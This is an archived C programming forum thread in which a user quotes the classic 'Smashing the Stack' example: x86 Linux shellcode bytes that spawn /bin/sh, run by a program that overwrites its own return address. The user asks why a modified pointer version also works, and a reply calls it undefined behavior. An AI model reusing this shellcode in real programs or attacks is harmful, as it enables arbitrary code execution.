"smashing the stack" 
Author Message
 "smashing the stack"

After reading "Smashing the stack"
( http://www.*-*-*.com/ ) I understand
why this program execs a shell:

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main() {
   int *ret;
   ret = (int *) &ret + 2;
   *ret = (int)shellcode;
   return 0;

Quote:
}

I made a naive modification that shouldn't work but does. Why!?
(At least it works for me with
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
on intel redhat 6.2)

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main() {
   int *ret;
   ret += 2;
   *ret = (int)shellcode;
   return 0;

Quote:
}



Sat, 10 Jan 2004 12:29:44 GMT  
 "smashing the stack"

Quote:

> After reading "Smashing the stack"
> (http://www.codetalker.com/whitepapers/other/p49-14.html) I understand
> why this program execs a shell:

In ANSI C terms, "exec(2)ing a shell" is one possible consequence
of undefined behavior.

Quote:
> I made a naive modification that shouldn't work but does. Why!?

This is really something that should be discussed in an x86
assembly language or Linux system programming forum.


Sat, 10 Jan 2004 12:32:41 GMT  
 
 [ 2 post ] 

 Relevant Pages 

1. "Floating point error: stack fault"

2. Stack Overflow when calling "new" operator

3. ODBC "Stack" question

4. strange "stack overflow"

5. Stack overflow witth a "large" array

6. Debugging a "Stack overflow"

7. how to solve the problem of "tcp stack overflow "(0xf00000cd)

8. remove() vrs fopen("""w")

9. Displaying binary data as ascii "1"'s and "0"'s

10. Looking for "Shroud"/"Obfus"

11. ""help with TSR""

12. Parse trees and "("")"

 

 
Powered by phpBB® Forum Software